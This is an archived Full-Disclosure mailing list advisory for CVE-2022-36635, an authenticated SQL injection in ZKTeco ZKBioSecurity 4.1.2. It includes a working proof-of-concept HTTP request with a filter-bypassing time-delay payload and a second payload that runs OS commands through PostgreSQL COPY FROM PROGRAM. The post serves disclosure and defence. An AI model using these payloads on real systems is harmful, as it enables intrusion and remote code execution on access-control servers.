lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAFBQuL5KA2JjM1UBLijt3mB52=EhnrhjZZ5OC90J+T2_z1+iTQ@mail.gmail.com>
Date: Thu, 29 Sep 2022 11:16:47 -0300
From: Caio B <caioburgardt@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] ZKBiosecurity - Authenticated SQL Injection resulting in RCE
	(CVE-2022-36635)

#######################ADVISORY INFORMATION#######################

Product: ZKSecurity BIO

Vendor: ZKTeco (
https://www.zkteco.com/en/ZKBiosecurity/ZKBioSecurity_V5000_4.1.2)

Version Affected: 4.1.2

CVE: CVE-2022-36635

Vulnerability: SQL Injection (with a plus: RCE)

#######################CREDIT#######################

This vulnerability was discovered and researched by Caio Burgardt and
Silton Santos.

#######################INTRODUCTION#######################

Based on the hybrid biometric technology and computer vision technology,
ZKBioSecurity provides a comprehensive web-based security platform. It
contains multiple integrated modules: personnel, time & attendance, access
control, visitor management, offline & online consumption management, guard
patrol, parking, elevator control, entrance control, Facekiosk, intelligent
video management, mask and temperature detection module, and other smart
sub-systems.

#######################VULNERABILITY DETAILS#######################

The parameters opTimeBegin e opTimeEnd are simply concatenated to the SQL
query, with only a sanitization filter in front of it. Using comments
(/**/) in place of spaces was enough to confuse and bypass the filter.

#######################PROOF OF CONCEPT#######################

Note that the request delayed 10s:

POST /baseOpLog.do HTTP/1.1

Host: {HOST}

Content-Type: application/x-www-form-urlencoded

Cookie: SESSION={COOKIE}; menuType=icon-only

Content-Length: 208

list&pageSize=50&opTimeBegin=2022-06-26%2000:00:00')/**/tmp_count;select/**/pg_sleep(10);/**/select+1+from+BASE_OPLOG/**/WHERE/**/'1'='1&opTimeEnd=2022-09-26%2023:59:59&sortName=&sortOrder=&posStart=0&count=50

if you use the next query, you can execute remote command:

list&pageSize=50&opTimeBegin=2022-04-11%2000:00:00&opTimeEnd=2022-07-11%2023:59:59')/**/tmp_count;DROP/**/TABLE/**/IF/**/EXISTS/**/cmd_exec;CREATE/**/TABLE/**/cmd_exec/**/(cmd_output/**/text);COPY/**/cmd_exec/**/FROM/**/PROGRAM/**/'ping+domain';SELECT/**/*/**/FROM/**/cmd_exec;/**/SeLECT/**/count/**/(1)/**/fRom/**/(SeLECT/**/t.CREATE_TIME/**/fROM/**/BASE_OPLOG/**/t/**/where/**/'1'='


#######################END#######################
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ